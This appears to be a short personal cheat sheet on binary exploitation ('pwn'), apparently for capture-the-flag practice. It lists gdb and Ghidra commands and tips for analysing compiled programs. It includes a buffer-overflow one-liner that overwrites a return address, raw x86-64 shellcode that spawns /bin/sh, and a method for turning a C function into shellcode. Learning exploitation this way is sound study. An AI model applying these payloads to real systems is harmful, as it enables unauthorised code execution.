Definition of pwn

To dominate in such a fashion as to gain ownership. A network, system, organization, or rival that comes under an adversary’s control is said to have been pwned.

This first exploration mainly focusses on pwn of compiled code.

method

  • analyses code with Ghidra
  • run it with gdb

GDB

  • set step-mode on: causes the step command to stop at the first instruction of a function which contains no debug line information rather than stepping over it.
  • break __libc_start_main: break before the main
  • break *0x... break at address (for instance break *0x401218).
  • layout asm to see the asm code
  • x/150x $sp see the last 150 value of the stack
  • x/50i $pc see the next 50 ASM instruction
  • display/50i $pc always display the next 50 ASM instruction
  • disassemble /m disassemble the whole function
  • p $_siginfo._sifields._sigfault.si_addr
  • https://www.0x0ff.info/2015/buffer-overflow-gdb-part1/

Tips and tricks

  • python is good to format input
print('\x61\x62...')
  • Breakpoint the RET gives directly the return address, and doing a step allow us to verify this address
  • Example of use of python with GDB
(python -c "print('break *0x401266\nr\n'+'a'*55+'\xa2\x11\x40\x00\x00\x00\x00\x00')"; cat) | gdb pwn

(python -c "import os; os.write(1, b'\x31\xc0\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\xb0\x3b\x0f\x05\n')"; cat)|./execut0r
  • for generating a custom shellcode, for instance for function:
void shell(void){
  puts("Enjoy your shell!");
  system("/bin/bash");
  return;
}

run:

gcc -c test.c
objdump test.o -d

read stack

stack="""
0x7ffdf9b4c130:0x65336135	0x63343465	0x64333637	0x64623637
0x7ffdf9b4c140:0x32323230	0x64386265	0x36323962
"""

for l in stack.split("\n"):
    if ":" not in l:
        continue
    for w in l.split(":")[1].split():
        for i in range(4):
            print(chr(int(w[-(2*i+2)]+w[-(2*i+1)], 16)), end="")

TODO